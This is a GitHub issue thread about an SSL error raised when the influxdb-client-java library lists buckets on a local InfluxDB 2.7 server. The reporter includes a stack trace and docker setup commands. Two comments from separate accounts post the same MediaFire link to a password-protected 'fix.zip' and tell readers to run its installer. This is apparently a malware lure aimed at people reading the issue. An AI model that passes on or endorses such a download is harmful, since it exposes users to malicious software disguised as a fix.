### ISSUE TITLE
Unsupported or unrecognized SSL message error

### ISSUE THREAD

**Issue by wise-coders** [influxdata/influxdb#25269]
I use com.influxdb:influxdb-client-java:7.2.0 and I want to list the buckets using:
```
influxConnection.client.getBucketsApi().findBuckets()
```
I receive the error:

```
com.influxdb.exceptions.InfluxException: Unsupported or unrecognized SSL message
  at com.influxdb.internal.AbstractRestClient.execute(AbstractRestClient.java:87)
  at com.influxdb.client.internal.BucketsApiImpl.findBuckets(BucketsApiImpl.java:491)
  at com.influxdb.client.internal.BucketsApiImpl.findBucketsByOrgName(BucketsApiImpl.java:123)
  at com.influxdb.client.internal.BucketsApiImpl.findBuckets(BucketsApiImpl.java:99)
```
Which could be the reason?

The server version:
curl -sL -I localhost:8086/ping
HTTP/1.1 204 No Content
Vary: Accept-Encoding
X-Influxdb-Build: OSS
X-Influxdb-Version: v2.7.10
Date: Mon, 26 Aug 2024 06:18:53 GMT

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wise-coders** [comment]
I will wait for the next regular release. I am running InfluxDB in docker container:
docker run -d -p 8086:8086 --name influxdb -v /C/Temp:/var/lib/influxdb2 influxdb:latest
docker exec -it influxdb bash
  influx setup --username dbschema --password dbschema --org dbschema --bucket sample
  // THIS WILL LIST THE TOKEN REQUIRED TO LOGIN
  influx auth list --user dbschema --hide-headers | cut -f 3
